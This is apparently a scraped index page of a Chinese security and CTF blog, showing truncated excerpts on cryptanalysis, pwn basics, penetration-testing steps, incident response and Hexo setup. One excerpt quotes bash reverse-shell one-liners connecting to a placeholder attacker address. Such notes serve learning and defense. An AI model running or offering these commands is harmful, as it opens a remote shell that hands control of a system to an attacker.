introspelliam / introspelliam.github.io Goto Github PK
View Code? Open in Web Editor NEWHome Page: https://Introspelliam.github.io
Home Page: https://Introspelliam.github.io
https://introspelliam.github.io/about/
Try your best!
其实最近做题有一些感触,觉得在自己服务器上搭建题目可能比较关键,常见的需要搭建的题目大概分为三大类:crypto、pwn、web。web搭建比较复杂,运维也很困难,有时候权限问题就会让运维着痛不欲生,而且一般来说做题的时候不太可能会拿到赛题;crypto有些赛题会给出一些代码,然后可以在内部运行,但也有可能不给代码,让你自己琢磨,这些都得靠你自己的思路;pwn题一般会给源码或者可执行文件,所以可以
test
https://introspelliam.github.io/2018/04/03/%E7%BA%BF%E6%80%A7%E5%88%86%E6%9E%90%E6%B3%95/
0x00 概述线性分析法、差分分析法作为SPN(Substitution Permutation Network)的常用解法,一直让密码学家痴迷。最近也因为0ctf的一些密码学题目,对线性分析法有了一定的了解,并想写篇博客将具体内容详细展示! 0x01 SPN网络介绍首先我们来看看这个spn网络 每轮都包含3个步骤:substitution(代替)、permutation(置换)、key-mix
asdfasgasgdasdg
asdfasg
https://introspelliam.github.io/tags/
Try your best!
本节详细可参考http://www.cnblogs.com/akira90/archive/2012/12/05/2802809.html 1. execve函数12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455 相关函数: fork,execl,
https://introspelliam.github.io/2017/12/09/web/%E5%8F%8D%E5%BC%B9Shell/
假设攻击端为10.0.0.1,接收端口为8080 服务器端为10.0.0.2 1、Bash关于bash中的重定向知识,可以参考shell之后的操作 服务器端: 1bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 1bash -c 'sh -i &>/dev/tcp/10.0.0.1/8080 0>&1&a
https://introspelliam.github.io/2017/12/05/python%E9%9D%99%E6%80%81%E7%BC%96%E8%AF%91/
1、windows 64位调用约定windows64 位的调用很是奇怪,因为它不是通过栈来传参,而是通过寄存器来传参! 最为常见的是,当参数只有一个的时候,一般是选用rcx来传递参数! 2、Linux 32位调用约定Linux 32位的系统调用时通过int 80h来实现的,eax寄存器中为调用的功能号,ebx、ecx、edx、esi等等寄存器则依次为参数。下面我们来看看hello world程序:
1,分析目标网站内容及功能 (1) 首先确定网站采用何种语言编写.或者是否有混用的情况.此处可以通过查看网站源文件,观察网站链接,捕获提交请求等方式获取. (2) 爬行网站目录,使用工具对网站目录进行爬行,可以辅助上一步让结果更加精准.将爬行结果存档,如果可以,此处应分析出网站是否使用通用程序,如果是,记录下来.进行下一步. (3) 根据上一步的爬行结果,对网站根目录或者关键目录进行暴
MathJax是使用LaTeX方式输入数学公式的好工具。Hexo虽然可以直接使用mathjax,但是存在一些不方便之处。使用hexo-math这个插件可以大大方便使用。使用Hexo 3.2.0,主题NexT 5.0.1,hexo-math 3.0.0安装方式如下 在hexo安装目录下执行 1npm install hexo-math --save 然后编辑站点根目录下的_config.yml,添加
1 事件分类常见的安全事件: Web入侵:挂马、篡改、Webshell 系统入侵:系统异常、RDP爆破、SSH爆破、主机漏洞 病毒木马:远控、后门、勒索软件 信息泄漏:拖裤、数据库登录(弱口令) 网络流量:频繁发包、批量请求、DDOS攻击 2 排查思路一个常规的入侵事件后的系统排查思路: 2.1 文件分析 a) 文件日期、新增文件、可疑/异常文件、最近使用文件、浏览器下载文件 b) Webshe
零、前言渗透测试在未得到被测试方授权之前依据某些地区法律规定是违法行为。 这里我们提供的所有渗透测试方法均为(假设为)合法的评估服务,也就是通常所说的道德黑客行为(Ethical hacking),因此我们这里的所有读者应当都是Ethical Hackers,如果您还不是,那么我希望您到过这里后会成为他们中的一员 ;)这里,我还想对大家说一些话:渗透测试重在实践,您需要一颗永不言败的心和一个有着活
操作系统提供了许多安全机制来尝试降低或阻止缓冲区溢出攻击带来的安全风险,包括DEP、ASLR等。在编写漏洞利用代码的时候,需要特别注意目标进程是否开启了DEP(Linux下对应NX)、ASLR(Linux下对应PIE)等机制,例如存在DEP(NX)的话就不能直接执行栈上的数据,存在ASLR的话各个系统调用的地址就是随机化的。 一、checksecchecksec是一个脚本软件,也就是用脚本写的一个
本文记录NexT主题中添加gitalk评论系统的步骤。gitalk:一个基于 Github Issue 和 Preact 开发的评论插件详情Demo可见:https://gitalk.github.io/ 1. Register Application在GitHub上注册新应用,链接:https://github.com/settings/applications/new参数说明:Applicat
https://introspelliam.github.io/categories/
Try your best!
本文记录NexT主题中添加gitalk评论系统的步骤。gitalk:一个基于 Github Issue 和 Preact 开发的评论插件详情Demo可见:https://gitalk.github.io/ 1. Register Application在GitHub上注册新应用,链接:https://github.com/settings/applications/new参数说明:Applicat
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.